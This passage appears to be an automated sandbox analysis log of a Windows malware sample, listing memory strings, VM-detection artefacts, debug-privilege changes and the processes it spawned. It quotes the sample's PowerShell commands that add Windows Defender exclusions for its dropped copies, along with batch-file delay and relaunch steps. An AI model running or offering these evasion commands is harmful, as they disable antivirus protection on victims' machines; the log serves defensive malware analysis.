                            Source: PlZA6b48MW.exe, 0000003B.00000002.2034332308.0000000002815000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAAk0BEPn
                            Source: PlZA6b48MW.exe, 0000003B.00000002.2358429393.0000000012623000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: eEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
                            Source: PlZA6b48MW.exe, 0000002F.00000002.2335905450.000000001BA80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: PlZA6b48MW.exe, 00000000.00000002.1818455182.000000001B64D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                            Source: PlZA6b48MW.exe, 0000002F.00000002.1927336033.00000000033D5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAAk0BE
                            Source: w32tm.exe, 00000033.00000002.1917011073.000001BFD85B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                            Source: PlZA6b48MW.exe, 0000003B.00000002.2418080151.000000001AEFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln9W6
                            Source: PlZA6b48MW.exe, 0000002F.00000002.1927336033.00000000033BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]0Rbi
                            Source: PlZA6b48MW.exe, 00000000.00000002.1818170448.000000001B5FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MappingStr
                            Source: PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000027FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]0RbiPn
                            Source: PlZA6b48MW.exe, 0000003B.00000002.2358429393.00000000127EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
                            Source: WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.2404697406.000000001B3DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: PlZA6b48MW.exe, 0000002D.00000002.2082966816.000000001B9D0000.00000004.00000020.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.2335905450.000000001BA80000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000037.00000002.1934994151.00000279C0309000.00000004.00000020.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.2404697406.000000001B2F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeProcess token adjusted: Debug
                            Source: C:\Program Files\Windows Multimedia Platform\dllhost.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess token adjusted: Debug
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeProcess token adjusted: Debug
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\py4wf331\py4wf331.cmdline"Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\dllhost.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PlZA6b48MW.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wA41hAKrBM.bat" Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEC13.tmp" "c:\Windows\System32\CSC745280B6A8F34BD8AA304A2671FFBC0.TMP"Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat" "
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\bjcQ5hKx2L.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\PlZA6b48MW.exe "C:\Users\user\Desktop\PlZA6b48MW.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6jqn6DqxiC.bat" "
                            Source: C:\Users\user\Desktop\PlZA6b48MW.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
